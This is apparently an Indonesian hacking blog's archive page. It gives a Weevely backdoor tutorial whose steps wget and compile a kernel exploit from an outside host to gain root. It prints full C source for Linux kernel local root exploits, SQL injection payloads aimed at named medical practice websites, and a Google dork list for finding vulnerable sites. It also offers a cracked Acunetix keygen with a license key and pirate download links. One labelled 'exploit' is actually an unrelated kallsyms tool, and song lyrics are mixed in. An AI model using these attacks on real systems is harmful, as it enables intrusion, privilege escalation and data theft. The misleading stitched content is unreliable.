Home » Archive for Agustus 2015

Rooting Server With Weevely | Windows | Linux

bahan-bahan:

-kopi

-otak

-internet

-python (jika belum ada disini)

-weevely ( disini )

oke langsung aja turorialnya:

ketik : cd\weevely ( di sesuaikan aja )

akan muncul "C:\weevely>"

Setelah itu siapkan file berformat php dan ksongkan saja kalau saya april.php

lalu jalan kan perintah :

C:\weevely>main.py -g -o april.php -p frishella.com

Nah jika keluar tulisan seperti di atas tandanya kalian sukses

nah setelah itu kalian upload file tadi ke website yang sudah kalian tanamkan backdoor

setelah itu kalian berikan perintah di cmd

main.py -t -u www.target.com/april.php -p frishella.com (password yang kalian buat)

oke setelah itu kalian terhubung terhadap servernya (backconnect)

berhubung website yang saya tanam tidak bisa di rooting karena masalah kernelnya makanya saya akan beri penjelasan melalui teks saja tidak ada foto

lalu kalian cek versi kernelnya dengan perintah uname -a

akan muncul versi kernelnya

[miedcom@snowleopard.ip-asia.com /home/miedcom/public_html] uname -aLinux snowleopard.ip-asia.com 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64 #1 SMP ThuDec 18 06:49:17 EST 2014 x86_64 x86_64 x86_64 GNU/Linux

oke setelah itu muncul versi kernelnya 2.6.32-531.29.2.lve1.3.11.1.el6.x86_64 #1 SMP Thu
Dec 18 06:49:17 EST 2014 (di sesuaikan dengan punya anda)

setelah itu kalian bisa cari di exploit db atau bisa di google

oke setelah kalian sudah punya kernelnya kalian berikan perintah

wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name

Contoh: www.exploit.com/2.6.18.c -o frishella.com

setelah gitu kalian ketik perintah
[miedcom@snowleopard.ip-asia.com /home/miedcom/public_html]cd ..
[miedcom@snowleopard.ip-asia.com /home/miedcom]cd tmp
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]

setelah gtu ketik ls
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]ls

akan muncul :
file
file1
anything

setelah itu kalian ketik perintah kembali :

wget www.exploit.com/2.6.18.c
setelah itu ketik lagi
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]gcc 2.6.18.c -o frishella.com (sesuaikan)

berikan perintah kembali :
[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]ls
akan keluar

2.6.18.c
file
file1
anything
frishella.com

lalu berikan perintah
chmod 777 frishella.com

jika sudah selesai ketik perintah
./frishella.com
.
.
.
.
.
done!

[miedcom@snowleopard.ip-asia.com /home/miedcom/tmp]id
uid=(root) gid=(root)

Acunetix Web Vulnerability Scanner 2015 Keygen

2012.05.11-original Enterprise Edition is not the most expensive, it is updated with the most expensive version of the key to do RI.

Official original download address: http://www.acunetix.com/download/fullver8

ID: acunetixwvsfullv8 PASSWORD: nFu834! 29bg_S2q

Found that does not support the directory listing, direct to a new version of the download path can also automatically install this upgrade:

http://www.acunetix.com/download/fullver8/2012_11_06_01_webvulnscan8.exe

Description: first official address to download the latest Enterprise Edition installation package [RI only supports the Enterprise Edition does not support the free version] to close the program after the installation is complete, open the crack, Point Patch registered the following registration information, registration then support normal upgrade!

Do not be used for illegal purposes, or peril!

License Key: 5s3b6136t52s56de60d1e76fgd4f7d5h

Name: Hmily / [LCG]

ComPany: Www.52PoJie.Cn

Email: Hmily@Acunetix.com

Telephone: 110

Acunetix_Web_Vulnerability_Scanner_8.x_Consultant _Edition_KeyGen.exe

MD5: 6EF77924A7D92E6FF168053E3B4A5814

Acunetix_Web_Vulnerability_Scanner_8.x_Consultant_Edition_KeyGen_Hmily [LCG]. Rar

MD5: 302C3EC2C7F726E253400CAB654C7AF5

Forum download:

http://www.52pojie.cn/thread-148273-1-1.html

My love cloud disk download:

http://down.52pojie.cn/LCG/Acunetix_Web_Vulnerability_Scanner_8.x_Consultant_Edition_KeyGen_Hmily. [LCG]. rar

Network disk download:

http://pan.baidu.com/netdisk/singlepublic?fid=182594_3695254633

source : http://hi.baidu.com

3.6,3.8.9-2013 -exploit

* CVE-2013-2094 exploit x86_64 Linux < 3.8.9
* by (sorbo@darkircop.org) June 2013
*
* Based on sd's exploit. Supports more targets.
*
*/

#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/perf_event.h>
#include <signal.h>
#include <assert.h>

#define BASE 0x380000000
#define BASE_JUMP 0x1780000000
#define SIZE 0x10000000
#define KSIZE 0x2000000

#define TMP(x) (0xdeadbeef + (x))

struct idt {
uint16_t limit;
uint64_t addr;
} __attribute__((packed));

static int _fd;

static int perf_open(uint64_t off)
{
struct perf_event_attr attr;
int rc;

// printf("perf open %lx [%d]\n", off, (int) off);

memset(&attr, 0, sizeof(attr));

attr.type = PERF_TYPE_SOFTWARE;
attr.size = sizeof(attr);
attr.config = off;
attr.mmap = 1;
attr.comm = 1;
attr.exclude_kernel = 1;

rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);

return rc;
}

void __sc_start(void);
void __sc_next(void);

void __sc(void)
{
asm("__sc_start:\n"
"call __sc_next\n"
"iretq\n"
"__sc_next:\n");
}

void sc(void)
{
int i, j;
uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));
uint64_t kbase = ((uint64_t)current) >> 36;
int uid = TMP(1);
int gid = TMP(2);

for (i = 0; i < 4000; i += 4) {
uint64_t *p = (void *) &current[i];
uint32_t *cred = (uint32_t*) p[0];

if ((p[0] != p[1]) || ((p[0]>>36) != kbase))
continue;

for (j = 0; j < 20; j++) {
if (cred[j] == uid && cred[j + 1] == gid) {
for (i = 0; i < 8; i++) {
cred[j + i] = 0;
return;
}
}
}
}
}

static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)
{
void *p;

p = memmem(sc, 900, &needle, sizeof(needle));
if (!p)
errx(1, "can't find %x", needle);

memcpy(p, &val, sizeof(val));
}

static void *map_mem(uint64_t addr)
{
void *p;

p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);

if (p == MAP_FAILED)
err(1, "mmap()");

return p;
}

static int find_mem(void *mem, uint8_t c)
{
int i;
uint8_t *p = mem;

for (i = 0; i < SIZE; i++) {
if (p[i] == c)
return i;
}

return -1;
}

static void dropshell()
{
if (setuid(0) != 0)
errx(1, "failed");

printf("Launching shell\n");

execl("/bin/sh", "sh", NULL);
exit(0);
}

void morte(int x)
{
printf("Got signal\n");
close(_fd);
dropshell();
}

static void trigger(int intr)
{
switch (intr) {
case 0:
do {
int z = 1;
int a = 1;

z--;

a /= z;
} while (0);
break;

case 4:
asm("int $4");
break;

case 0x80:
asm("int $0x80");
break;

default:
errx(1, "unknown intr %d", intr);
}

sleep(3);
}

int main(int argc, char *argv[])
{
uint32_t *p[2];
int fd, i;
uint64_t off;
uint64_t addr = BASE;
struct idt idt;
uint8_t *kbase;
int sz = 4;
int intr = 4;

printf("Searchin...\n");

p[0] = map_mem(BASE);
p[1] = map_mem(BASE_JUMP);

memset(p[1], 0x69, SIZE);

off = 0xFFFFFFFFL;
fd = perf_open(off);
close(fd);

i = find_mem(p[0], 0xff);
if (i == -1) {
i = find_mem(p[1], 0x68);

if (i == -1)
errx(1, "Can't find overwrite");

sz = 24;
addr = BASE_JUMP;
printf("detected CONFIG_JUMP_LABEL\n");
}

munmap(p[0], SIZE);
munmap(p[1], SIZE);

addr += i;
addr -= off * sz;

printf("perf_swevent_enabled is at 0x%lx\n", addr);

asm("sidt %0" : "=m" (idt));

printf("IDT at 0x%lx\n", idt.addr);

off = addr - idt.addr;
off -= 8;

switch (off % sz) {
case 0:
intr = 0;
break;

case 8:
intr = 0x80;
break;

case 16:
intr = 4;
break;

default:
errx(1, "remainder %d", off % sz);
}

printf("Using interrupt %d\n", intr);

off -= 16 * intr;

assert((off % sz) == 0);

off /= sz;
off = -off;

// printf("Offset %lx\n", off);

kbase = (uint8_t*) (idt.addr & 0xFF000000);

printf("Shellcode at %p\n", kbase);

if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
err(1, "mmap()");

memset(kbase, 0x90, KSIZE);
kbase += KSIZE - 1024;

i = __sc_next - __sc_start;
memcpy(kbase, __sc_start, i);
kbase += i;
memcpy(kbase, sc, 900);

sc_replace(kbase, TMP(1), getuid());
sc_replace(kbase, TMP(2), getgid());

signal(SIGALRM, morte);
alarm(2);

printf("Triggering sploit\n");
_fd = perf_open(off);

trigger(intr);

exit(0);
}

2.6.32.9-rscloud #6 SMP Thu Mar 11 14:32:05 UTC 2010 x86_64 - Exploit

===============================================
Linux Kernel 2.6.32 Local Root Exploit (x86_64)
===============================================

===============================================
Linux Kernel 2.6.32 Local Root Exploit (x86_64)
===============================================

Tested on: Windows XP

Exploit Tested:  2.6.32.9-rscloud #6 SMP Thu Mar 11 14:32:05 UTC 2010 x86_64 GNU/Linux

# Author: FuRty
# Email : fir4t@fir4t.org
# Web   : www.mykingdom.us
# Greetz: RedGuard, Trsniper
# Special Thanks : KnocKout and Inj3ct0r Team
# Video : http://www.facebook.com/video/video.php?v=101428079927069

--------------------------------------------


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define KSYM_NAME_LEN  127


struct sym_entry {
 unsigned long long addr;
 unsigned int len;
 unsigned char *sym;
};


static struct sym_entry *table;
static unsigned int table_size, table_cnt;
static unsigned long long _text, _stext, _etext, _sinittext, _einittext, _sextratext, _eextratext;
static int all_symbols = 0;
static char symbol_prefix_char = '\0';

int token_profit[0x10000];

/* the table that holds the result of the compression */
unsigned char best_table[256][2];
unsigned char best_table_len[256];


static void usage(void)
{
 fprintf(stderr, "Usage: kallsyms [--all-symbols] [--symbol-prefix=<prefix char>] < in.map > out.S\n");
 exit(1);
}

/*
 * This ignores the intensely annoying "mapping symbols" found
 * in ARM ELF files: $a, $t and $d.
 */
static inline int is_arm_mapping_symbol(const char *str)
{
 return str[0] == '$' && strchr("atd", str[1])
        && (str[2] == '\0' || str[2] == '.');
}

static int read_symbol(FILE *in, struct sym_entry *s)
{
 char str[500];
 char *sym, stype;
 int rc;

 rc = fscanf(in, "%llx %c %499s\n", &s->addr, &stype, str);
 if (rc != 3) {
  if (rc != EOF) {
   /* skip line */
   fgets(str, 500, in);
  }
  return -1;
 }

 sym = str;
 /* skip prefix char */
 if (symbol_prefix_char && str[0] == symbol_prefix_char)
  sym++;

 /* Ignore most absolute/undefined (?) symbols. */
 if (strcmp(sym, "_text") == 0)
  _text = s->addr;
 else if (strcmp(sym, "_stext") == 0)
  _stext = s->addr;
 else if (strcmp(sym, "_etext") == 0)
  _etext = s->addr;
 else if (strcmp(sym, "_sinittext") == 0)
  _sinittext = s->addr;
 else if (strcmp(sym, "_einittext") == 0)
  _einittext = s->addr;
 else if (strcmp(sym, "_sextratext") == 0)
  _sextratext = s->addr;
 else if (strcmp(sym, "_eextratext") == 0)
  _eextratext = s->addr;
 else if (toupper(stype) == 'A')
 {
  /* Keep these useful absolute symbols */
  if (strcmp(sym, "__kernel_syscall_via_break") &&
      strcmp(sym, "__kernel_syscall_via_epc") &&
      strcmp(sym, "__kernel_sigtramp") &&
      strcmp(sym, "__gp"))
   return -1;

 }
 else if (toupper(stype) == 'U' ||
   is_arm_mapping_symbol(sym))
  return -1;
 /* exclude also MIPS ELF local symbols ($L123 instead of .L123) */
 else if (str[0] == '$')
  return -1;

 /* include the type field in the symbol name, so that it gets
  * compressed together */
 s->len = strlen(str) + 1;
 s->sym = malloc(s->len + 1);
 if (!s->sym) {
  fprintf(stderr, "kallsyms failure: "
   "unable to allocate required amount of memory\n");
  exit(EXIT_FAILURE);
 }
 strcpy((char *)s->sym + 1, str);
 s->sym[0] = stype;

 return 0;
}

static int symbol_valid(struct sym_entry *s)
{
 /* Symbols which vary between passes.  Passes 1 and 2 must have
  * identical symbol lists.  The kallsyms_* symbols below are only added
  * after pass 1, they would be included in pass 2 when --all-symbols is
  * specified so exclude them to get a stable symbol list.
  */
 static char *special_symbols[] = {
  "kallsyms_addresses",
  "kallsyms_num_syms",
  "kallsyms_names",
  "kallsyms_markers",
  "kallsyms_token_table",
  "kallsyms_token_index",

 /* Exclude linker generated symbols which vary between passes */
  "_SDA_BASE_",  /* ppc */
  "_SDA2_BASE_",  /* ppc */
  NULL };
 int i;
 int offset = 1;

 /* skip prefix char */
 if (symbol_prefix_char && *(s->sym + 1) == symbol_prefix_char)
  offset++;

 /* if --all-symbols is not specified, then symbols outside the text
  * and inittext sections are discarded */
 if (!all_symbols) {
  if ((s->addr < _stext || s->addr > _etext)
      && (s->addr < _sinittext || s->addr > _einittext)
      && (s->addr < _sextratext || s->addr > _eextratext))
   return 0;
  /* Corner case.  Discard any symbols with the same value as
   * _etext _einittext or _eextratext; they can move between pass
   * 1 and 2 when the kallsyms data are added.  If these symbols
   * move then they may get dropped in pass 2, which breaks the
   * kallsyms rules.
   */
  if ((s->addr == _etext && strcmp((char*)s->sym + offset, "_etext")) ||
      (s->addr == _einittext && strcmp((char*)s->sym + offset, "_einittext")) ||
      (s->addr == _eextratext && strcmp((char*)s->sym + offset, "_eextratext")))
   return 0;
 }

 /* Exclude symbols which vary between passes. */
 if (strstr((char *)s->sym + offset, "_compiled."))
  return 0;

 for (i = 0; special_symbols[i]; i++)
  if( strcmp((char *)s->sym + offset, special_symbols[i]) == 0 )
   return 0;

 return 1;
}

static void read_map(FILE *in)
{
 while (!feof(in)) {
  if (table_cnt >= table_size) {
   table_size += 10000;
   table = realloc(table, sizeof(*table) * table_size);
   if (!table) {
    fprintf(stderr, "out of memory\n");
    exit (1);
   }
  }
  if (read_symbol(in, &table[table_cnt]) == 0)
   table_cnt++;
 }
}

static void output_label(char *label)
{
 if (symbol_prefix_char)
  printf(".globl %c%s\n", symbol_prefix_char, label);
 else
  printf(".globl %s\n", label);
 printf("\tALGN\n");
 if (symbol_prefix_char)
  printf("%c%s:\n", symbol_prefix_char, label);
 else
  printf("%s:\n", label);
}

/* uncompress a compressed symbol. When this function is called, the best table
 * might still be compressed itself, so the function needs to be recursive */
static int expand_symbol(unsigned char *data, int len, char *result)
{
 int c, rlen, total=0;

 while (len) {
  c = *data;
  /* if the table holds a single char that is the same as the one
   * we are looking for, then end the search */
  if (best_table[c][0]==c && best_table_len[c]==1) {
   *result++ = c;
   total++;
  } else {
   /* if not, recurse and expand */
   rlen = expand_symbol(best_table[c], best_table_len[c], result);
   total += rlen;
   result += rlen;
  }
  data++;
  len--;
 }
 *result=0;

 return total;
}

static void write_src(void)
{
 unsigned int i, k, off;
 unsigned int best_idx[256];
 unsigned int *markers;
 char buf[KSYM_NAME_LEN+1];

 printf("#include <asm/types.h>\n");
 printf("#if BITS_PER_LONG == 64\n");
 printf("#define PTR .quad\n");
 printf("#define ALGN .align 8\n");
 printf("#else\n");
 printf("#define PTR .long\n");
 printf("#define ALGN .align 4\n");
 printf("#endif\n");

 printf(".data\n");

 /* Provide proper symbols relocatability by their '_text'
  * relativeness.  The symbol names cannot be used to construct
  * normal symbol references as the list of symbols contains
  * symbols that are declared static and are private to their
  * .o files.  This prevents .tmp_kallsyms.o or any other
  * object from referencing them.
  */
 output_label("kallsyms_addresses");
 for (i = 0; i < table_cnt; i++) {
  if (toupper(table[i].sym[0]) != 'A') {
   printf("\tPTR\t_text + %#llx\n",
    table[i].addr - _text);
  } else {
   printf("\tPTR\t%#llx\n", table[i].addr);
  }
 }
 printf("\n");

 output_label("kallsyms_num_syms");
 printf("\tPTR\t%d\n", table_cnt);
 printf("\n");

 /* table of offset markers, that give the offset in the compressed stream
  * every 256 symbols */
 markers = malloc(sizeof(unsigned int) * ((table_cnt + 255) / 256));
 if (!markers) {
  fprintf(stderr, "kallsyms failure: "
   "unable to allocate required memory\n");
  exit(EXIT_FAILURE);
 }

 output_label("kallsyms_names");
 off = 0;
 for (i = 0; i < table_cnt; i++) {
  if ((i & 0xFF) == 0)
   markers[i >> 8] = off;

  printf("\t.byte 0x%02x", table[i].len);
  for (k = 0; k < table[i].len; k++)
   printf(", 0x%02x", table[i].sym[k]);
  printf("\n");

  off += table[i].len + 1;
 }
 printf("\n");

 output_label("kallsyms_markers");
 for (i = 0; i < ((table_cnt + 255) >> 8); i++)
  printf("\tPTR\t%d\n", markers[i]);
 printf("\n");

 free(markers);

 output_label("kallsyms_token_table");
 off = 0;
 for (i = 0; i < 256; i++) {
  best_idx[i] = off;
  expand_symbol(best_table[i], best_table_len[i], buf);
  printf("\t.asciz\t\"%s\"\n", buf);
  off += strlen(buf) + 1;
 }
 printf("\n");

 output_label("kallsyms_token_index");
 for (i = 0; i < 256; i++)
  printf("\t.short\t%d\n", best_idx[i]);
 printf("\n");
}


/* table lookup compression functions */

/* count all the possible tokens in a symbol */
static void learn_symbol(unsigned char *symbol, int len)
{
 int i;

 for (i = 0; i < len - 1; i++)
  token_profit[ symbol[i] + (symbol[i + 1] << 8) ]++;
}

/* decrease the count for all the possible tokens in a symbol */
static void forget_symbol(unsigned char *symbol, int len)
{
 int i;

 for (i = 0; i < len - 1; i++)
  token_profit[ symbol[i] + (symbol[i + 1] << 8) ]--;
}

/* remove all the invalid symbols from the table and do the initial token count */
static void build_initial_tok_table(void)
{
 unsigned int i, pos;

 pos = 0;
 for (i = 0; i < table_cnt; i++) {
  if ( symbol_valid(&table[i]) ) {
   if (pos != i)
    table[pos] = table[i];
   learn_symbol(table[pos].sym, table[pos].len);
   pos++;
  }
 }
 table_cnt = pos;
}

/* replace a given token in all the valid symbols. Use the sampled symbols
 * to update the counts */
static void compress_symbols(unsigned char *str, int idx)
{
 unsigned int i, len, size;
 unsigned char *p1, *p2;

 for (i = 0; i < table_cnt; i++) {

  len = table[i].len;
  p1 = table[i].sym;

  /* find the token on the symbol */
  p2 = memmem(p1, len, str, 2);
  if (!p2) continue;

  /* decrease the counts for this symbol's tokens */
  forget_symbol(table[i].sym, len);

  size = len;

  do {
   *p2 = idx;
   p2++;
   size -= (p2 - p1);
   memmove(p2, p2 + 1, size);
   p1 = p2;
   len--;

   if (size < 2) break;

   /* find the token on the symbol */
   p2 = memmem(p1, size, str, 2);

  } while (p2);

  table[i].len = len;

  /* increase the counts for this symbol's new tokens */
  learn_symbol(table[i].sym, len);
 }
}

/* search the token with the maximum profit */
static int find_best_token(void)
{
 int i, best, bestprofit;

 bestprofit=-10000;
 best = 0;

 for (i = 0; i < 0x10000; i++) {
  if (token_profit[i] > bestprofit) {
   best = i;
   bestprofit = token_profit[i];
  }
 }
 return best;
}

/* this is the core of the algorithm: calculate the "best" table */
static void optimize_result(void)
{
 int i, best;

 /* using the '\0' symbol last allows compress_symbols to use standard
  * fast string functions */
 for (i = 255; i >= 0; i--) {

  /* if this table slot is empty (it is not used by an actual
   * original char code */
  if (!best_table_len[i]) {

   /* find the token with the breates profit value */
   best = find_best_token();

   /* place it in the "best" table */
   best_table_len[i] = 2;
   best_table[i][0] = best & 0xFF;
   best_table[i][1] = (best >> 8) & 0xFF;

   /* replace this token in all the valid symbols */
   compress_symbols(best_table[i], i);
  }
 }
}

/* start by placing the symbols that are actually used on the table */
static void insert_real_symbols_in_table(void)
{
 unsigned int i, j, c;

 memset(best_table, 0, sizeof(best_table));
 memset(best_table_len, 0, sizeof(best_table_len));

 for (i = 0; i < table_cnt; i++) {
  for (j = 0; j < table[i].len; j++) {
   c = table[i].sym[j];
   best_table[c][0]=c;
   best_table_len[c]=1;
  }
 }
}

static void optimize_token_table(void)
{
 build_initial_tok_table();

 insert_real_symbols_in_table();

 /* When valid symbol is not registered, exit to error */
 if (!table_cnt) {
  fprintf(stderr, "No valid symbol.\n");
  exit(1);
 }

 optimize_result();
}


int main(int argc, char **argv)
{
 if (argc >= 2) {
  int i;
  for (i = 1; i < argc; i++) {
   if(strcmp(argv[i], "--all-symbols") == 0)
    all_symbols = 1;
   else if (strncmp(argv[i], "--symbol-prefix=", 16) == 0) {
    char *p = &argv[i][16];
    /* skip quote */
    if ((*p == '"' && *(p+2) == '"') || (*p == '\'' && *(p+2) == '\''))
     p++;
    symbol_prefix_char = *p;
   } else
    usage();
  }
 } else if (argc != 1)
  usage();

 read_map(stdin);
 optimize_token_table();
 write_src();

 return 0;
}


# 1337day.com [2010-10-27]

Linux Kernel 2.6.37 <= 3.x.x - Local Root Exploit

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/bash", "-sh", NULL);
}

Medical Website Design SQL Injection Vulnerability

######################

# Exploit Title : Medical Website Design SQL Injection Vulnerability

# Exploit Author : Black Worm

# Vendor Homepage : http://www.medicalpracticewebsitedesign.com/

# Google Dork : "Medical Practice Website Design" inurl:.php?newsid=

# Date: 2015-07-24

# Tested On : Win 7 / Mozilla Firefox



# Gereetz to : ANonCoders

######################

#

# demos and explanations :

#

# http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://personalizXedcardiology.com/news-topic.php?newsid=-27%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--

# http://www.medXassocga.com/news-topic.php?newsid=-31%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--

# http://www.sspXinst.us/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--

# http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--

#

# and google more

#

######################

# discovered by : Black Worm

######################

Love Me Like You Do | Ellie Goulding Lyrics

You're the light, you're the night
You're the color of my blood
You're the cure, you're the pain
You're the only thing I wanna touch
Never knew that it could mean so much, so much

You're the fear, I don't care
'Cause I've never been so high
Follow me to the dark
Let me take you past our satellites
You can see the world you brought to life, to life

So love me like you do, lo-lo-love me like you do
Love me like you do, lo-lo-love me like you do
Touch me like you do, to-to-touch me like you do
What are you waiting for?

Fading in, fading out
On the edge of paradise
Every inch of your skin is a holy grail I've got to find
Only you can set my heart on fire, on fire
Yeah, I'll let you set the pace
'Cause I'm not thinking straight
My head spinning around I can't see clear no more
What are you waiting for?

Love me like you do, lo-lo-love me like you do
Love me like you do, lo-lo-love me like you do
Touch me like you do, to-to-touch me like you do
What are you waiting for?

Love me like you do, lo-lo-love me like you do (like you do)
Love me like you do, lo-lo-love me like you do (yeah)
Touch me like you do, to-to-touch me like you do
What are you waiting for?

I'll let you set the pace
'Cause I'm not thinking straight
My head spinning around I can't see clear no more
What are you waiting for?

Love me like you do, lo-lo-love me like you do (like you do)
Love me like you do, lo-lo-love me like you do (yeah)
Touch me like you do, to-to-touch me like you do
What are you waiting for?

flashlight-jessie-j Lyrics Terjamahan

When tomorrow comes
Saat esok tiba
I'll be on my own
Aku kan sendirian
Feeling frightened up
Merasa takut
The things that I don't know
Pada hal-hal yang tak kutahu
When tomorrow comes
Saat esok tiba
Tomorrow comes
Esok tiba
Tomorrow comes
Esok tiba
And though the road is long
Dan meski jalannya panjang
I look up to the sky
Kutatap angkasa

In the dark I found, I stop and I won't fly
Di dalam gelap kudapati, kuberhenti dan aku takkan terbang
And I sing along, I sing along, then I sing along
Dan kubernyanyi, kubernyanyi, lalu kubernyanyi
I got all I need when I got you and I
Kumiliki semua yang kubutuhkan saat kumiliki dirimu dan aku
I look around me, and see sweet life
Kulihat sekitarku, dan kulihat hidup yang indah
I'm stuck in the dark but you're my flashlight
Aku terjebak dalam gelap tapi kaulah lampu senterku
You're gettin' me, gettin' me through the night
Kau membuatku bisa, membuatku bisa lalui malam
Can't stop my heart when you shinin' in my eyes
Tak bisa hentikan hatiku saat kau bersinar di mataku
Can't lie, it's a sweet life
Tak bisa berdusta, ini hidup yang indah

I'm stuck in the dark but you're my flashlight
Aku terjebak dalam gelap tapi kaulah lampu senterku
You're gettin' me, gettin' me through the night
Kau membuatku bisa, membuatku bisa lalui malam
Cause you're my flash light
Karena kaulah senterku
You're my flash light, you're my flash light
Kaulah senterku, kaulah senterku
I see the shadows long beneath the mountain top
Kulihat bayan-bayang jauh di bawah puncak gunung
I'm not afraid when the rain won't stop
Aku tak takut saat hujan tak berhenti
Cause you light the way
Karena kau terangi jalan
You light the way, you light the way
Kau terangi jalan, kau terangi jalan

Dork Sql Injection 2015 Fresh!

dork sql injection 2015

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

